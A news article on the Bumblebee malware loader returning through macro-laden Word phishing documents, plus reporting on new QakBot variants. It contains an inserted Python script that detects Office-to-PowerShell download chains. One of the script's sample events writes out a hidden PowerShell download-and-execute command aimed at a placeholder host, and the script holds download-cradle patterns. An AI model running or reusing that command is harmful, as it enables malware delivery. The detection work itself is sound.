The infamous malware loader and initial access broker known as Bumblebee resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024.
Enterprise security firm Proofpoint said the activity is targeting organizations in the United States with voicemail-themed lures containing links to OneDrive URLs.
“The URLs led to a Word file with names like ‘ReleaseEvans#96.docm’ (the digits before the file extension varied),” the company said in a report on Tuesday. “The Word document spoofed consumer electronics company Humane.”
Opening the document triggers VBA macros that launch a PowerShell command to download and run another PowerShell script from a remote server, which in turn retrieves and runs the Bumblebee loader.
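A detection-side illustration of the chain described above (added here; not code from Proofpoint or the report). It assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine) and runs over constructed sample events: a benign Word launch, an admin-run script, and one event where Word spawns PowerShell with a download cradle.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not real telemetry. The URL is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\a\Downloads\ReleaseEvans#96.docm"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download-cradle and evasion markers typical of macro-launched PowerShell.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|net\.webclient|\bhttps?://", re.I)
EVASION_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy)?\s+bypass|-enc(odedcommand)?\b|-nop\b", re.I)

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event matches the Office macro -> PowerShell
    download chain; an empty list means no match."""
    parent, child, cmd = basename(event["ParentImage"]), basename(event["Image"]), event["CommandLine"]
    reasons = []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        reasons.append(f"office_spawned_shell:{parent}->{child}")
        if CRADLE_RE.search(cmd):
            reasons.append("download_cradle")
        if EVASION_RE.search(cmd):
            reasons.append("evasion_flags")
    return reasons

def triage(events):
    """Map event index -> reasons for every event that matches."""
    return {i: r for i, e in enumerate(events) if (r := classify(e))}

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60], reasons)
```

Only the third constructed event is flagged; the Office-parent check alone is the high-signal condition, and the cradle and evasion markers add context for triage.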
Bumblebee, first spotted in March 2022, is primarily designed to download and execute follow-on payloads such as ransomware. It has been used by several crimeware threat actors who had previously been observed delivering BazaLoader (also known as BazarLoader) and IcedID.
It is also suspected to have been developed by threat actors behind the Conti and TrickBot cybercrime syndicates as a replacement for BazarLoader. In September 2023, Intel 471 revealed a Bumblebee distribution campaign that used Web Distributed Authoring and Versioning (WebDAV) servers to spread the loader.
The attack chain is notable for its reliance on macro-enabled documents, especially considering that Microsoft began blocking macros in Office files downloaded from the internet by default starting in July 2022, prompting threat actors to modify and diversify their approaches.
Bumblebee’s return also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files.
“The .MSI file drops a Windows .cab (Cabinet) archive, which in turn contains a DLL,” cybersecurity firm Sophos said on Mastodon. “The .MSI extracts the DLL from the .cab and executes it using shellcode. The shellcode causes the DLL to generate a second copy of itself and insert the bot code into the memory space of the second instance.”
The latest QakBot artifacts have been found to strengthen the encryption used to hide strings and other information, including the use of a crypter called DaveCrypter, making the malware more difficult to analyze. The new generation also restores the ability to detect whether the malware is running inside a virtual machine or sandbox.
Another crucial change is the encryption of all communications between the malware and the command-and-control (C2) server using AES-256, a stronger method than that used in versions prior to the dismantling of QakBot’s infrastructure at the end of August 2023.
“The dismantling of the QakBot botnet infrastructure was a victory, but the bot’s creators remain free, and someone with access to the original QakBot source code has been experimenting with new builds and testing the waters with these latest variants,” said Andrew Brandt, principal researcher at Sophos X-Ops.
“One of the most notable changes involves a change to the encryption algorithm used by the bot to hide the default configurations hardcoded into the bot, making it harder for analysts to see how the malware works; attackers are also restoring previously deprecated features, such as virtual machine (VM) detection, and testing them in these new versions.”
QakBot also emerged as the second most popular malware in January 2024, behind FakeUpdates (also known as SocGholish) but ahead of other families such as Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.
The development comes as Malwarebytes revealed a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk to supposedly fix non-existent problems, ultimately allowing threat actors to gain control of the machine.